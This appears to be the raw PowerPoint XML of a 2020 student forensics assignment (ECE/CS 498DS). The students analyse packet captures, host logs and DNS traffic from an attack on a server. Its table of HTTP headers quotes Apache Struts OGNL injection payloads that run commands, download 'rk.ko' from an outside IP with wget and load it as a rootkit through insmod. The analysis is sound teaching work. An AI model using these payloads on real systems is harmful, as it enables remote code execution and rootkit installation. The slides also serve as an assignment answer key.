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62.212.156.148/rk.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3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Akhilesh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Somani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (somani4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gowtham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kuntumalla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (gowtham4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manan Mehta (mananm2)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DNS Traffic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838200" y="1636326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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a) Provide the IP address of the attacker-controlled DNS server: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162.212.156.148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752F6-8EB9-4A8F-90AE-C928C2E0ACE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2070998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(b)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Provide the IP address of the attacker-controlled DNS server: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10.0.2.15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06A4-71EE-4E88-AD4C-123D6657C51F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2483647"/>
            <a:ext cx="414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Histogram of the length of DNS queries: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B115-6F15-4490-8CC3-40EF57787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85" y="2505670"/>
            <a:ext cx="5403397" cy="42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9" y="197024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503789" y="1248863"/>
            <a:ext cx="97937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0.6.(a) Which http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file represents legitimate activity, and which represents attacker activity?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> represents attacker activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http2.pcap represents legitimate activity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0.6.(b) Are there any Content-Type headers in legitimate activity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file? If there are, list those Content-Type headers.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There are no Content-Type headers in the legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pcap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (http2.pcap)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Task 1. 1. a Report the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>UNIX timestamp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>of the first attempted scan on the vulnerable server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1521394903.610774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Task 1. 1.b W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>hat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>IP address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>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172.17.0.2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Task 1. 1.c What is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0"/>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t> of the vulnerable server?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8080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13656"/>
            <a:ext cx="10515600" cy="2025162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2.a Provide a list of the Content-Type headers sent to the vulnerable server from the provided HTTP packet capture. For each Content-Type header, provide its length as well.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="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3298B2-2071-48C7-A8DA-8F2A0FBC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9576"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="742948" y="1946246"/>
          <a:ext cx="10706102" cy="469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788">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="398297121"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1189314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1729151460"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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57808"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2061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application/x-www-form-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>urlencoded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160381"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3232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.multipart/form-data~${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>addHeader</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>("LOLOLOLOLOLPAYLOADWORKEDLOLOLOLOL",1330+7)}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166069"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="82732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='ls').(#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262506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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>whoami</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>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}:{'/bin/bash',’c',#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1574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='insmodrk.ko.1').(#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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>newjava.lang.ProcessBuilder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478880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%{(#_='multipart/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>formdata</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>').(#dm=@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>).(#_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?(#_</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>memberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>container.getInstance</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ognlUtil.getExcludedPackageNames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ognlUtil.getExcludedClasses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().clear()).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>context.setMemberAccess</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#dm)))).(#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=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wget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http://162.212.156.148/rk.ko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 &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>rk.ko</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>’) .(#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=(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.System@getProperty</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>('os.name').</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>toLowerCase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>().contains('win'))).(#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=(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>iswin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>?{'cmd.exe','/c',#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}:{'/bin/bash','-c',#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})).(#p=new </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>java.lang.ProcessBuilder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cmds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p.redirectErrorStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(true)).(#process=#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>p.start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>()).(#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=(@org.aapache.struts2.ServletActionContext@getResponse().</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>getOutputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())).(@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>org.apache.commons.io.IOUtils@copy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>process.getInputStream</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>(),#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>)).(#</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
                        <a:t>ros.flush</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0"/>
                        <a:t>())}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31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66737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>2.b Fill in the blanks in the table below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028DC-E350-496A-BE6F-EA851853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79467"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1803400" y="1948848"/>
          <a:ext cx="8127999" cy="454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348039590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11502925"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4273549">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2032268951"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="772209">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Command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the attack?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2076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whoami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the name of the current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2933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wget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Free utility for non-interactive web downloads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58871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files within a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0908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Print file or input on the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07177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Change working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528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insmod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Insert a module into the Linux Kernel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87055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ssh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Remote connect to a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34672"/>
                  </a:ext>
                </a:extLst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lsmod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currently loaded kernel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59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8" y="1272665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1.a Provide a list of kernel modules added or removed from the system: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F7F0-EF21-4F9B-9ED2-B02AA32C8AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="5019362"/>
            <a:ext cx="890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1.b What is the attacker-controlled kernel module?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rk.ko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FCD11-15B0-4BBA-B656-095B77FD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0" y="1676412"/>
            <a:ext cx="494538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1.c How did you verify that the module was loaded onto the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24F35-29A3-4606-85E5-6BDE7158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56" y="1900883"/>
            <a:ext cx="7528560" cy="16611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47212F-4F7D-4631-A257-0FEA298131C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4186106" y="2365695"/>
            <a:ext cx="51172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7A4C1-4A1B-41EC-814A-9AB128D1E444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773534" y="3857578"/>
            <a:ext cx="11063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Helvetica Neue"/>
              </a:rPr>
              <a:t>the module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rk.ko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was "added" (as seen in the action column), we can say that the attacker kernel is loaded.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is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>file name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that contains the internal hostnames?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known_hosts.swp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95325" y="1522026"/>
            <a:ext cx="10106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Do you observe any evidence that the attacker extracted the internal host names via HTTP in the logs? (If yes, report the log line. If not, briefly explain why not. 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We don’t see any evidence that the attacker extracted internal host names via HTTP, probably because the attacker was not naïve.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30231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1264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Mini-Project 3 Checkpoint 1 ECE/CS 498DS Spring 2020</vt:lpstr>
      <vt:lpstr>Task 0</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – HTTP Traffic Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – Host Logs Analysis</vt:lpstr>
      <vt:lpstr>Task 1 – DNS Traffic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Mehta, Manan</cp:lastModifiedBy>
  <cp:revision>83</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-30T21:31:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-13T01:53:55Z</dcterms:modified>
</cp:coreProperties>
</file>